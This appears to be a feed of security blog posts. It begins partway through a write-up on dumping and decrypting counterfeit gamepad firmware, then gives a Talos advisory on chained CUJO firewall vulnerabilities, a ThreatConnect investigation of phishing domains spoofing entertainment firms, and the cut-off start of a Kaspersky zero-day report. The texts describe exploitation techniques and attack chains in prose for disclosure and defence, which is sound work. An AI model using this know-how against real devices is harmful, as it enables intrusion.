This is easy to demonstrate with human interface devices (HID), including gamepads. HIDs come with additional descriptors (HID Descriptor, Report Descriptor, Physical Descriptor). A Report Descriptor is quite different from the other descriptors and consists of different items that describe supported reports. If a report is missing from Report Descriptor, then the OS will refuse to complete it, even if it’s handled in the device. This basically detracts from the discovery and exploitation of vulnerabilities in the firmware of USB devices and those nuances most probably prevented the discovery of vulnerabilities in the past.

To solve this problem without having to read and recompile the sources of the Linux kernel, I just used low end instruments that I had available at hand: Arduino Mega board and USB Host Shield (total < $30).


Connection scheme

After connecting devices with the above scheme, I used the Arduino board to perform a Control Transfer without any interference from the operating system.


Arduino Mega + USB Host Shield

The counterfeit gamepad had the same vulnerabilities as Gator Claw and the first thing I did was to dump part of the firmware.


Partial dump of firmware

The easiest way to find the base address of the firmware dump is to find a structure with pointers to known data. After that we can calculate the delta of addresses and load a partial dump of the firmware to IDA Pro.


Structure with pointers to known data

The firmware dump allowed us to find out the address of the printf() function that outputs the information in UART required for factory quality assurance. More than that, I was able to find the hexdump() function in the dump, meaning I didn’t even need to write shellcode.


Finding functions that aid exploitation

After locating the UART points on the printed circuit board of the gamepad, soldering wires and connecting them to a TTL2USB adapter, we can see the output in a serial terminal.


Standard UART output during gamepad boot

A standard library for Nuvoton microcontrollers comes with a very handy handler of Hard Fault exceptions that outputs a register dump. This greatly facilitates in exploitation and allows exploits to be debugged.


UART output after Hard Fault exception caused by stack overwrite

A final exploit to dump firmware can be seen in the screenshot below.


Exploit and shellcode to dump firmware over UART

But this way to dump firmware is not perfect because the microcontrollers of the Nuvoton M451 family may have two different types of firmware – main firmware (APROM) and mini-firmware for device firmware update (LDROM).


Memory map of flash memory and system memory in different modes

APROM and LDROM are mapped at the same memory addresses and because of that it’s only possible to dump one of them. To get a dump of LDROM firmware we need to disable the security lock and read the flash memory with a programming tool.


Shellcode that disables security lock

Crypto fail

Analysis of the firmware responsible for updates (LDROM) revealed that it’s mostly standard code from Nuvoton, but with added code to decrypt firmware updates.


Cryptographic algorithm scheme for decryption of firmware updates

The cryptographic algorithm used for decrypting firmware updates is a custom block cipher. It is performed in cipher block chaining mode, but the block size is just 32 bits. This algorithm takes a key that is a textual (ascii) identificator of the product and array of instructions that define what transformation should be performed on the current block. After encountering the end of the key and array their current position is set to the initial position. The list of transformations includes six operations: xor, subtraction, subtraction (reverse), and the same operations but with the bytes swapped. Because the firmware contains large areas filled with zeroes, it makes it easy to calculate the secret parts of this algorithm.


Revealing the firmware update encryption key

Applying the algorithm extracted from the firmware of the counterfeit gamepad to all the firmware of the accessories found on the site of a major OEM manufacturer revealed that all of them use this encryption algorithm, and the weaknesses in this algorithm allowed us to calculate the encryption keys for all devices and decrypt their firmware updates. In other words, the algorithm used inside the counterfeit product led to the security of all the products developed by that manufacturer being compromised.

Conclusion

This blog post turned out to be quite long, but I really wanted to prepare it for a very wide audience. I have given a step-by-step guide on the analysis of embedded firmware, finding vulnerabilities and exploiting them to acquire a firmware dump and to carry out code execution on a USB device.

The subject of glitching attacks is not included in the scope of this article, but such attacks are also very effective against USB devices. For those who want to learn more about them, I recommend watching this video. For those wondering how pirates managed to acquire the algorithm and key from DualShock 4 to make their own devices, I suggest reading this article.

As for the mystery of the auxiliary microcontroller that was used to keep secrets, I found out that it was not used in all devices and was only added for obscurity. This microcontroller doesn’t keep any secrets and is only used for SHA1 and SHA256. This research also aids enthusiasts to create their own open source projects for use with game consoles.

As for buyers of counterfeit gamepads, they are not in an enviable position because manufacturers block illegally used keys and the users end up without a working gamepad or hints on where to get firmware updates.

Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE!

Microsoft's products are still a leading source of exploitable security vulnerabilities used by hackers, according to a report by the firm Recorded Future.

The post Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE! appeared first on The Security Ledger.

Related Stories

CEOs more likely to receive pay rise after a cyber attack. Wait, what?

Bosses are more likely to receive a pay rise after their firm suffers a cybersecurity breach, a study has found. Researchers at Warwick Business School found that media reports of a cyber attack led to a stock market shock as investors sold their shares, but this only lasted a few days. Security breaches did have a lasting impact on the way firms were run, as they typically paid lower dividends and invested less in research … More

The post CEOs more likely to receive pay rise after a cyber attack. Wait, what? appeared first on Help Net Security.

Vulnerability Spotlight: Multiple Vulnerabilities in CUJO Smart Firewall, Das U-Boot, OCTEON SDK, Webroot BrightCloud


Claudio Bozzato of Cisco Talos discovered these vulnerabilities.

 

Executive summary


CUJO AI produces the CUJO Smart Firewall, a device that provides protection to home networks against a myriad of threats such as malware, phishing websites and hacking attempts. Cisco Talos recently discovered 11 vulnerabilities in the CUJO Smart Firewall. These vulnerabilities could allow an attacker to bypass the safe browsing function and completely take control of the device, either by executing arbitrary code in the context of the root account, or by uploading and executing unsigned kernels on affected systems.

In accordance with our coordinated disclosure policy, Cisco Talos worked with CUJO AI to ensure that these issues are resolved and that a firmware update is available for affected customers. In most typical scenarios the firmware update process is handled by CUJO AI, allowing this update to be deployed to affected customers automatically. Given that these devices are typically deployed to provide protection for networked environments, it is recommended that affected users confirm their devices have been updated as soon as possible to ensure that the devices are no longer affected by these vulnerabilities.

Exploitation


In order to better convey the threat that these issues pose in real-world implementations, this section groups the vulnerabilities based on realistic attack scenarios in which the vulnerabilities would likely be exploited, and illustrates how chaining them together would raise the impact on the device.

CUJO is based on the OCTEON's SDK, which results in a Linux-based operating system running a kernel with PaX patches, which is not common for internet-of-things (IoT) appliances. However, the majority of the vulnerabilities are not affected by this countermeasure.

Remote code execution, unauthenticated, with persistence


We identified two chains that could be used to execute code remotely without authentication.

    1. TALOS-2018-0683 describes a vulnerability in the Webroot BrightCloud SDK, a service used to retrieve websites' classification and reputation data. CUJO uses BrightCloud as part of their safe browsing protection. By exploiting this vulnerability, an unauthenticated attacker could be able to impersonate BrightCloud's services and execute code on the device as the root user. As described in TALOS-2018-0686, the BrightCloud SDK defaults to using HTTP connections to communicate with the remote BrightCloud services, making the exploitation of TALOS-2018-0683 trivial if an attacker is able to intercept traffic between CUJO and BrightCloud. 

    2. CUJO uses the Lunatik Lua engine in order to execute Lua scripts from within the kernel context. This is used to analyze the traffic of the entire network and is part of CUJO's safe browsing protection. TALOS-2018-0703 describes a script injection vulnerability that allows any unauthenticated user in the local network to execute Lua scripts in the kernel by specifying an arbitrary "Host" header in HTTP requests. Since Lunatik permits the use of the unsafe `load()` Lua function, this allows an attacker to execute arbitrary code in the kernel. Additionally, TALOS-2018-0702 describes an issue that can be used to trick CUJO into extracting and analyzing any arbitrary hostname. As shown at the end of the TALOS-2018-0703 advisory, a malicious website could chain both vulnerabilities together in order to force any client machine in CUJO's network to perform a POST request via JavaScript, triggering the Lua injection and effectively executing code in the kernel.
      Note that the vulnerabilities above can also be executed from the local network. Moreover, they can be further chained with the "verified boot bypass" described below in order to permanently compromise the device.

      Local network code execution, unauthenticated


      As previously stated, the two chains above can be exploited from the local network.

      Additionally, we identified two code execution vulnerabilities (TALOS-2018-0653 and TALOS-2018-0672) that affect the parsing of mDNS messages. Note, however, that CUJO constrains the affected `mdnscap` process in a low-privileged chroot-ed environment. Therefore, an attacker would need to escalate their privileges in order to fully compromise the device.

      Smartphone app code execution, with persistence


      CUJO users can download an app on Android and iOS devices to configure their device. Since CUJO acts as a router and serves DHCP requests, it is possible to use the app to set up static DHCP entries. TALOS-2018-0627 shows how to leverage a vulnerability in the way DHCP hostnames are handled in order to execute arbitrary operating system commands as the root user.

      Note that this can be further chained with the "verified boot bypass" described below in order to permanently compromise the device.

      Device-local verified boot bypass (persistence methods)


      CUJO uses Das U-Boot's "Verified Boot," an open-source primary boot loader that aims to protect the boot process from unauthorized modifications, and as a consequence, at avoiding a persistent compromise of the device. Moreover, the first 16MB of CUJO's eMMC have been permanently write-protected, so that it is not possible, even for the manufacturer, to modify the system's bootloaders. We identified two vulnerabilities that bypass these protections.

      • We identified an issue in Das U-Boot, affecting versions 2013.07-rc1 to 2014.07-rc2 (inclusive). TALOS-2018-0633 shows that U-Boot FIT images' signatures are not enforced, since it is still possible to boot from legacy unsigned images. This behavior can be exploited by simply replacing a signed FIT image with a legacy (and thus unsigned) image. CUJO uses the OCTEON SDK, which in turn uses U-Boot version 2013.07, so they are both vulnerable to this issue. Because of this, and since products have no possibility to use the impacted U-Boot versions without avoiding the issue, this CVE has been assigned to U-Boot.

      As previously stated, since the U-Boot bootloader is unmodifiable, TALOS-2018-0633 cannot be fixed in CUJO. Note, however, that, in isolation, this is less severe of an issue. See our discussion below for more details.

      • TALOS-2018-0634 describes an additional way to bypass the secure boot process. By modifying the `dhcpd.conf` file, it is possible to make the DHCP server execute shell commands. Since this file persists across reboots, it is possible to execute arbitrary commands as root at each boot, effectively compromising the system's integrity.

      Safe browsing bypass


      Finally, TALOS-2018-0702 shows how to bypass CUJO's safe browsing, potentially allowing malicious websites to serve malware even in presence of CUJO's filtering.

      Vulnerability details


      CUJO Smart Firewall static DHCP hostname command injection vulnerability (TALOS-2018-0627/CVE-2018-3963)


      The CUJO Smart Firewall is vulnerable to command injection within the DHCP daemon configuration present on affected devices. This vulnerability exists due to a lack of proper input sanitization during the DHCP configuration process. This vulnerability can be triggered when configuring a new static DHCP address on affected devices. An attacker could send a DHCP request message and set up a corresponding static DHCP entry to trigger this vulnerability. It should be noted that in order to modify the DHCP configuration on devices, an attacker would first need to authenticate to the system using valid user credentials. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands within the context of the root account on the system. For additional information, please see the advisory here.

      Das U-Boot verified boot bypass (TALOS-2018-0633/CVE-2018-3968)


      Das U-Boot allows an attacker to execute an unsigned kernel embedded in a legacy image format if they are able to supply a boot image to the device. This vulnerability exists due to the fact that the version of Das U-Boot used by the devices lacks proper FIT signature enforcement during the boot process. While Das U-Boot has silently fixed this issue, the version used by the CUJO Smart Firewall was not updated to the new version, and is thus vulnerable. However we believe it's only a medium severity issue in CUJO specifically, since the exploitation requires either physical or local access to the device (e.g. via an additional root exploit). For additional information, please see the advisory here.

      CUJO Smart Firewall dhcpd.conf verified boot bypass (TALOS-2018-0634/CVE-2018-3969)


      The CUJO Smart Firewall is vulnerable to a bypass of the verified boot process. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary system commands during the system boot process. By embedding system commands into the `/config/dhcpd.conf` file, an attacker can force those commands to be executed each time the system is rebooted. Also, since this information is stored in the /config partition, it is persistent across reboots. In order to successfully exploit this vulnerability, an attacker would need the ability to write to the `/config/dhcpd.conf` file on affected systems. It is important to note that this is achievable using TALOS-2018-0627, which is described above. For additional information, please see the advisory here.

      CUJO Smart Firewall mdnscap mDNS record parsing code execution vulnerability (TALOS-2018-0653/CVE-2018-3985)


      The CUJO Smart Firewall is vulnerable to an exploitable double free vulnerability present in the `mdnscap` binary on affected systems. This vulnerability exists due to the system freeing a memory space twice when an invalid query name is encountered while the device is parsing mDNS packets. This vulnerability could be leveraged by an unauthenticated attacker to obtain the ability to execute arbitrary code in the context of the mdnscap process. In order to fully compromise the system, an attacker would still need to escape the `chroot` environment and further escalate privileges. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS label compression denial-of-service vulnerability (TALOS-2018-0671/CVE-2018-4002)


      The CUJO Smart Firewall is vulnerable to an exploitable denial-of-service vulnerability in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly processing label compression pointers while parsing mDNS packets. In certain conditions, the improper handling of compression pointers in mDNS packets can lead to uncontrolled recursion, which causes stack exhaustion and ultimately crashes the `mdnscap` process, causing a denial-of-service condition. An unauthenticated remote attacker could leverage a specially crafted mDNS packet to exploit this vulnerability and create a denial-of-service condition on affected devices. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS character-strings code execution vulnerability (TALOS-2018-0672/CVE-2018-4003)


      The CUJO Smart Firewall is vulnerable to an exploitable code execution vulnerability in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly handling string lengths that may exist in the character strings in mDNS resource records. A specially crafted mDNS resource record could be leveraged by an unauthenticated remote attacker to create a heap-based buffer overflow condition and ultimately lead to arbitrary code execution in the context of the `mdnscap` process on affected devices. In order to fully compromise the system, an attacker would still need to escape the `chroot` environment and further escalate privileges. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS SRV Record denial-of-service vulnerability (TALOS-2018-0681/CVE-2018-4011)


      The CUJO Smart Firewall is vulnerable to an exploitable integer underflow vulnerability present in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly handling the "RDLENGTH" value when parsing SRV records in mDNS packets. An unauthenticated remote attacker could leverage a specially crafted SRV record to trigger this vulnerability and create a denial-of-service condition on affected devices. For additional information, please see the advisory here.


      Webroot BrightCloud SDK HTTP headers-parsing code execution vulnerability (TALOS-2018-0683/CVE-2018-4012)


      The Webroot BrightCloud SDK is vulnerable to an exploitable buffer overflow in the HTTP header-parsing function. The function `bc_http_read_header` incorrectly handles overlong headers, leading to arbitrary code execution. An unauthenticated attacker could impersonate a remote BrightCloud server to trigger this vulnerability and gain arbitrary code execution on affected devices. This SDK is found inside the CUJO Smart Firewall, as well as the CUJO Smart Firewall and the Webroot BrightCloud SDK. For additional information, please see the advisory here.


      Webroot BrightCloud SDK HTTP connection unsafe defaults vulnerability (TALOS-2018-0686/CVE-2018-4015)


      An exploitable vulnerability exists in the HTTP client function of the Webroot BrightCloud SDK, which is used by the CUJO Smart Firewall. The configuration of the HTTP client does not enforce a secure connection by default, resulting in a failure to validate TLS certificates. An attacker could impersonate a remote BrightCloud server to exploit this vulnerability using a man-in-the-middle attack. Successful exploitation could result in exposure of sensitive credentials, the transparent alteration of BrightCloud queries, or exploitation of vulnerabilities in the underlying SDK. For additional information, please see the advisory here.

      CUJO Smart Firewall safe browsing Host header parsing firewall bypass vulnerability (TALOS-2018-0702/CVE-2018-4030)


      The CUJO Smart Firewall is vulnerable to an exploitable firewall evasion in the HTTP and HTTPS parsing used by the firewall's safe browsing function. This vulnerability exists due to the firewall improperly processing host information in HTTP and HTTPS traffic that is inspected by the devices during web reputation checking. An attacker could create specially crafted web traffic to evade this reputation checking and allow hosts to access external web servers that the firewall would not otherwise allow access to. For additional information, please see the advisory here.


      CUJO Smart Firewall threatd hostname reputation check code execution vulnerability (TALOS-2018-0703 / CVE-2018-4031)


      The CUJO Smart Firewall is vulnerable to an exploitable code execution vulnerability in the HTTP and HTTPS parsing used by the firewall's safe browsing function. This vulnerability exists due to lack of sanitization of host information present in HTTP and HTTPS traffic that is inspected by the devices during web reputation checking. This vulnerability could be leveraged by an attacker to execute arbitrary code on affected devices. An attacker could create a specially crafted network packet or leverage a malicious web server to exploit this vulnerability. For additional information, please see the advisory here.

      Versions Tested


      Talos tested and confirmed that the following CUJO Smart Firewall firmware versions are affected:

      TALOS-2018-0627 affects CUJO Smart Firewall, version 7003.

      TALOS-2018-0633 affects CUJO Smart Firewall, version 7003; OCTEON-SDK 3.1.2 to 5.1; and Das U-Boot 2013.07-rc1 to 2014.07-rc2.

      Conclusion


      As previously described, CUJO AI has provided a system update to resolve these issues. Since these devices are typically relied on to secure home network environments, they may be deployed in sensitive locations within the network. It is recommended that affected users confirm their devices have been updated as soon as possible to ensure that the devices are no longer affected by these vulnerabilities.

      Coverage


      The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

      Snort Rules: 47234, 47663, 47809, 47811, 47842, 48261, 48262

      Lights, Camera, Actionable Intelligence!

      ThreatConnect Research builds out a network of domains and subdomains spoofing organizations related to the entertainment industry, most likely used in credential harvesting efforts.

      To be frank, if we were going to give out an award for this acting, we don’t know who it would go to. Following a partner tip identifying IP addresses hosting entertainment industry spoofed domains hosting credential harvesting sites, we identified over 50 domains and 320 subdomains most likely associated with a single actor or group. These domains were registered between 2017 – 2019 and suggest a widespread, ongoing campaign as of early March of this year, but we have yet to identify the actor’s motivations, whether they are targeting the spoofed organizations, and what they intend to use stolen credentials for.

      In this case, we were able to build out an understanding of this actor’s infrastructure using a variety of capabilities from DomainTools, Farsight DNSDB, and Censys. Notably, this actor had a penchant to reuse SSL certificate common names and domain name strings across their other domains’ subdomains. Exploiting these crossovers helped us identify connections where WHOIS or hosting co-location research failed. We then reviewed the network and screenshots of identified infrastructure for notable themes in an attempt to better understand how the actor was operating or who they were targeting. Finally, we explored methods to proactively monitor for new infrastructure possibly related to this activity based on registration and hosting consistencies.

      Research and Findings

      An industry contact tipped us to the presence of several domains spoofing entertainment organizations at IP addresses 142.11.205[.]49 and 185.175.208[.]217. While they didn’t mention specific domains, the IPs and context they shared were significantly valuable and enabled our own research efforts. We considered those IPs our starting point for this investigation and began the investigation by reviewing them.

      142.11.205[.]49
      Reviewing this IP address using DomainTools Iris, we note that, as of February 20 2019, only five domains are hosted there. Of those domains, four of them — adfs-amcnetworks[.]com, adfs-sony[.]com, sts-warnerbros[.]com, and umgconnect-umusic[.]com — spoof organizations in the entertainment industry. The final domain — common-oauth[.]com — is consistent with other domains that would surface during the course of this research.

      Searching DomainTools Iris for 142.11.205[.]49

       

      While only one of these domains leads us to an actor-owned email address — heckman1243@gmail[.]com — the small number of domains hosted at this IP and the fact that most of them spoof an organization in the entertainment industry lead us to believe that this IP address is dedicated to a single user. Based on this IP and the aforementioned registrant email address, we identify the following domains:

      DomainIPRegistrant Email
      adfs-amcnetworks[.]com142.11.205[.]49heckman1243@gmail[.]com
      adfs-marvelstudios[.]com185.175.208[.]217heckman1243@gmail[.]com
      adfs-sony[.]com142.11.205[.]49contact@privacyprotect.org
      ansafoto-ansa[.]com185.175.208[.]217heckman1243@gmail[.]com
      artandcommerces[.]com185.175.208[.]217heckman1243@gmail[.]com
      common-auth[.]com185.175.208[.]217heckman1243@gmail[.]com
      common-oauth[.]com142.11.205[.]49contact@privacyprotect.org
      diiimex[.]com185.175.208[.]217heckman1243@gmail[.]com
      foxgroup-okta[.]comTaken OverTaken Over
      sjobergbildbyra[.]com185.175.208[.]217heckman1243@gmail[.]com
      sonymusic-okta[.]comParkedheckman1243@gmail[.]com
      space-hightail[.]com185.175.208[.]217heckman1243@gmail[.]com
      sts-warnerbros[.]com142.11.205[.]49contact@privacyprotect.org
      thelicensing-project[.]com185.175.208[.]217heckman1243@gmail[.]com
      umgconnect-umusic[.]com142.11.205[.]49contact@privacyprotect.org

      185.175.208[.]217
      Similarly reviewing the IP 185.175.208[.]217 in Iris, we see that over 280 domains are hosted at this IP as of February 20.

      Searching DomainTools Iris for 185.175.208[.]217

       

      There was no single, discernible theme or registrant that we could identify from the domains hosted at this IP address. Several domains and subdomains hosted here spoof entertainment organizations, many contain strings referencing cryptocurrencies or gift cards, and others seem general or aren’t immediately discernible. Searching for this IP against our Technical Blogs and Reports source identifies a Proofpoint report on a cryptocurrency giveaway scam.

      WHOIS for 185.175.208[.]217

       

      The WHOIS for this IP from DomainTools indicates that it is part of a subnet used by HostSlick customers in London, suggesting that it is a multi-tenant IP. To that end, all domains hosted at this IP address are not associated with the same actor or activity. Ultimately, this means we’ll have to conduct a more manual review of the domains hosted at this IP to assess whether or not they may be associated with the entertainment industry activity we were alerted to.

      Manual Review

      We initially started by enumerating the domains hosted at 185.175.208[.]217 and manually reviewing them to identify the ones that appear to spoof organizations in or related to the entertainment industry, or are similar to those previously identified. This identified the following additional domains currently hosted at 185.175.208[.]217:

      DomainIPRegistrant Email
      adfs-aenetworks[.]com185.175.208[.]217contact@privacyprotect.org
      babirad-pictures[.]net185.175.208[.]217contact@privacyprotect.org
      commonoauth[.]com185.175.208[.]217contact@privacyprotect.org
      commonoauth2[.]com185.175.208[.]217contact@privacyprotect.org
      dllmex[.]com185.175.208[.]217contact@privacyprotect.org
      foxgroup-box[.]com185.175.208[.]217contact@privacyprotect.org
      fs-starz[.]com185.175.208[.]217contact@privacyprotect.org

      However, further reviewing resolutions for this IP address using our Farsight DNSDB integration, we identified older domains from 2017 like press-amcnetworks[.]com, gettyimages-okta[.]com, harpercollins-okta[.]com, harpercollinsokta[.]com, and login-hulu[.]com that also fit the theme.

      Historic Resolutions for 185.175.208[.]217 Related to Entertainment Industry

       

      More interestingly, in some cases, strings specific to domains we had already identified showed up in subdomains for other parent domains we had not yet identified.

      Infrastructure with “sjobergbildbyra” String

       

      In other cases the opposite was true — subdomains for the domains we identified showed strings specific to other domains at 185.175.208[.]217 that we had not identified. Some of the identified subdomains were also suggestive of technologies — like Microsoft, Okta, and GoDaddy — that the actors were spoofing for probable credential harvesting efforts.

      Subdomain String Identifying Related Infrastructure

       

      We also note similar crossovers and repetitions in the SSL certificates used for these sites. Reviewing the below SSL certificate in Censys, we see that it was used across multiple domains specifically related to the entertainment industry, as well as subdomains for serverdata[.]tech.

       

      Censys Certificate Information

       

      Iterating this research through pDNS and SSL certificates for these domains and subdomains based on these crossovers, we can ultimately identify over 380 domains and subdomains most likely associated with this activity. We have shared the identified infrastructure in various incidents associated with Campaign 2017 – 2019 Credential Harvesting and Spoofed Domains Related to the Entertainment Sector.

      Themes in Infrastructure

      After identifying all of the associated domains and subdomains, we saved and reviewed these sites in the Internet Archive. This ultimately revealed some interesting themes in the infrastructure this actor used and the different services or organizations they spoofed.

      Picturesmaxx Infrastructure
      While the domain and subdomain string crossovers may be suggestive of a less sophisticated adversary, this actor may have put in the leg work and thoroughly researched one of the organizations they planned to impersonate.

      As of early February 2019, the domain picturesmaxx[.]com redirected to the domain for PictureMaxx — a service that provides media asset management and “provides entry to the world’s largest network of professional content portals and empowers users to access, organize and distribute content more efficiently.” Dozens of subdomains for picturesmaxx[.]com lead to spoofed login pages for various organization, many of which are photography studios or agencies.

      Screenshot of adoc.wg.picturesmaxx[.]com

      Screenshot of alivepress.wg.picturesmaxx[.]com

      Screenshot of babirad-pictures.picturesmaxx[.]com

      Screenshot of sjobergbildbyra.picturesmaxx[.]com

       

      As it turns out, most of the organizations spoofed with these picturesmaxx[.]com subdomains are also listed customers of the legitimate PictureMaxx company.

      Further suggesting that this actor did their due diligence in preparing for this role, many of the subdomains are consistent in naming convention when compared with the legitimate domains for PictureMaxx. As an example — the spoofed login page brauerphotos.wg.picturesmaxx[.]com and the legitimate brauerphotos.wg.picturemaxx.com.

      We also considered the possibility that picturesmaxx[.]com was legitimate and actually owned by PictureMaxx; however, the registration and hosting information for picturesmaxx[.]com are inconsistent with other legitimate domains registered by PictureMaxx.

      Authentication Spoofing Infrastructure
      As of March 3 2019, this research has identified seven domains associated with this activity that spoof authentication infrastructure:

      • mscommonauth[.]com
      • auth-owa[.]com
      • common-oauth[.]com
      • common-auth[.]com
      • commonoauth[.]com
      • commonoauth2[.]com
      • common-oauth2[.]com

      Dozens of hosted subdomains for these domains indicate that the actor behind this activity is spoofing Microsoft, GoDaddy, Okta, Hulu, and public relations firms associated with the entertainment industry as part of their operations. For subdomains spoofing organizations related to the entertainment industry, like those with PR firm strings, we do not know if those organizations were targeted directly or spoofed to pursue other organizations. Examples include the following:

      • microsoftonline.com.common-oauth2[.]com
      • godaddy.external.revalidation.common-oauth[.]com
      • revalidate.external-site.commonoauth2[.]com
      • hulusso.revalidate.external-site.commonoauth2[.]com
      • publiceye.revalidate.sso.microsoftonline.auth-owa[.]com
      • ledecompany.revalidate.sso.microsoftonline.auth-owa[.]com
      • okta.revalidate.external-site.commonoauth2[.]com

      In some cases, these authentication-spoofing subdomains hosted the probable credential harvesting sites and indicate that the actor used a variety of spoofed sites that are specific to various organizations. Beyond the site’s URL, these pages appear legitimate and were most likely created by scraping those organizations’ actual login pages.

      Screenshot of validation.auth.login.microsoftonline.commonoauth2[.]com

      Screenshot of umgconnect.umusic.revalidate.external-site.commonoauth2[.]com

      Screenshot of login.hulusso.revalidate.external-site.commonoauth2[.]com

      Screenshot of foxsso.okta.revalidate.external-site.commonoauth2[.]com

       

      In one case that we were able to identify, the actor behind this activity set up a spoofed authentication site with a pre-populated email address, most likely suggestive of an individual targeted in this operation.

      Screenshot of Pre-populated Credential Harvesting Site

      WeTransfer Spoofed Domains
      The third notable theme among the domains and subdomains we identified indicate that the actors are spoofing the file transfer service site WeTransfer. In most cases, the identified parent domains suggest this actor is spoofing WeTransfer in conjunction with a photography studio. While we don’t know if these studios are being targeted or their likeness is just being used to target larger organizations, one of the identified subdomains suggests that the latter may be the case.

      • wetransfer[.]plus
      • xn--wetransfr-2f7d[.]com
      • austinhargrave-wetransfer[.]com
      • ellenvonunwerth-wetransfer[.]com
      • peterlindbergh-wetransfer[.]com
      • bbsphoto-wetransfer.picturesmaxx[.]com
      • spaces-hightail.seligerstudio-wetransfer[.]com
      • foxgroup-okta.seligerstudio-wetransfer[.]com

      None of the WeTransfer spoofing infrastructure we identified and reviewed were hosting login pages directly. Some of the identified domains did redirect to a legitimate WeTransfer subdomain hosting a file upload page with a pre-populated “studio” email address.

      Screenshot of WeTransfer Redirect with Pre-populated Email Address

      Considering that the WeTransfer file transfer service is inconsistent with what an actor would mimic to conduct credential harvesting, at this time we are not sure how this spoofed infrastructure is being used. Additionally, we are not aware of the extent to which the actor has control over the legitimate WeTransfer subdomain site shown above.

      Monitoring for Similar Registrations

      As more and more infrastructure related to this activity shows up on a seemingly daily basis, it’s important to call out some avenues for proactively identifying new infrastructure, potentially before it is used in operations.

       There are two actor-specific email addresses that we saw used to register the domains in this activity — heckman1243@gmail[.]com and grabowskiedwin@gmail[.]com. New domains registered using these email addresses probably will be related to this activity and should be scrutinized as such. In ThreatConnect, our DomainTools-powered Tracks can be used to monitor for new domains where these email addresses are in the WHOIS.

      Creating a ThreatConnect Track for heckman1243@gmail[.]com

       

      Reviewing the name servers being used for the domains in this activity we identify ns1.hostslick[.]com and ns1.anons[.]io. As of early March, these name servers are used by about 180 and 250 domains respectively, so while they are relatively small, domains unrelated to this activity almost certainly use these name servers. To that end, reviewing newly registered domains using these name servers for entertainment-related spoofs may help identify new infrastructure associated with this activity. A similar ThreatConnect Track to the one above can be used to look for new domains with the name server in the WHOIS.

      Finally, monitoring passive DNS for IP addresses hosting the aforementioned domains can help identify newly hosted domains. Specifically, the IP addresses 142.11.205[.]49 and 31.148.220[.]196 host relatively few domains and possibly are dedicated to the actor behind this activity. New domains and subdomains resolving here have a good chance of being related to this activity. In ThreatConnect, clicking Follow Item on an IP address will alert you to new domains resolving to that IP address when DNS is enabled.

      Screenshot of Following 31.148.220[.]196 in ThreatConnect

      Similar to the research that we went through in the beginning, while 185.175.208[.]217 hosts many domains related to this activity, it hosts many seemingly unrelated domains as well. Monitoring passive DNS resolutions for this IP may help identify new infrastructure, but additional research into those new resolutions would be required.

      Conclusions

      As more of this infrastructure turns up, we’ll continue to share new intelligence in this Campaign Group. To date, we’ve identified about 390 domains, subdomains, and IPs associated with this activity by monitoring name servers, passive DNS resolutions, and specific email address registrations. Despite having identified a significant amount of infrastructure related to this activity, there are still a number of things that we don’t know or have the necessary insight to answer and hope to assess with future intelligence. Those include the following:

      • Who is behind this activity?
      • Who specifically is being targeted?
      • Has any of this activity actually been successful?
      • What is the end goal of this effort?
      • How operations leveraging this infrastructure unfold.
      • Whether other domains at the IP 185.175.208[.]217, and previously identified activity, are associated with the actor behind this entertainment industry activity.

      This investigation highlights a couple of important points that bear mentioning. First, knowing who or which threat group is behind activity isn’t necessary to build out your understanding of their network. Further, knowing the who isn’t necessary to exploit their registration and hosting tactics to proactively identify new, related infrastructure and actionable intelligence. Finally, in cases where traditional WHOIS or DNS co-location research fails, reviewing infrastructure naming conventions may help identify additional domains and subdomains associated with an actor.

      The post Lights, Camera, Actionable Intelligence! appeared first on ThreatConnect | Intelligence-Driven Security Operations.

      Is AI really intelligent or are its procedures just averagely successful?

      Artificial intelligence (AI) and machine learning algorithms such as Deep Learning have become integral parts of our daily lives: they enable digital speech assistants or translation services, improve medical diagnostics and are an indispensable part of future technologies such as autonomous driving. Based on an ever increasing amount of data and powerful novel computer architectures, learning algorithms appear to reach human capabilities, sometimes even excelling beyond. The issue: so far it often remains unknown to … More

      The post Is AI really intelligent or are its procedures just averagely successful? appeared first on Help Net Security.

      The fourth horseman: CVE-2019-0797 vulnerability

      In February 2019, our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. We reported it to Microsoft on February 22, 2019. The company confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft have just released a patch, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery:

      This is the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows we have discovered recently using our technologies. Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to CVE-2019-0797 and CHAINSHOT, SandCat also uses the FinFisher/FinSpy framework.

      Kaspersky Lab products detected this exploit proactively through the following technologies:

      1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products;
      2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA).

      Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

      • HEUR:Exploit.Win32.Generic
      • HEUR:Trojan.Win32.Generic
      • PDM:Exploit.Win32.Generic

      Brief technical details – CVE-2019-0797

      CVE-2019-0797 is a race condition that is present in the win32k driver due to a lack of proper synchronization between undocumented syscalls NtDCompositionDiscardFrame and NtDCompositionDestroyConnection. The vulnerable code can be observed below on screenshots made on an up-to-date system during initial analysis:

      Snippet of NtDCompositionDiscardFrame syscall (Windows 8.1)

      On this screenshot with the simplified logic of the NtDCompositionDiscardFrame syscall you can see that this code acquires a lock that is related to frame operations in the structure DirectComposition::CConnection and tries to find a frame that corresponds to a given id and will eventually call a free on it. The problem with this can be observed on the second screenshot:

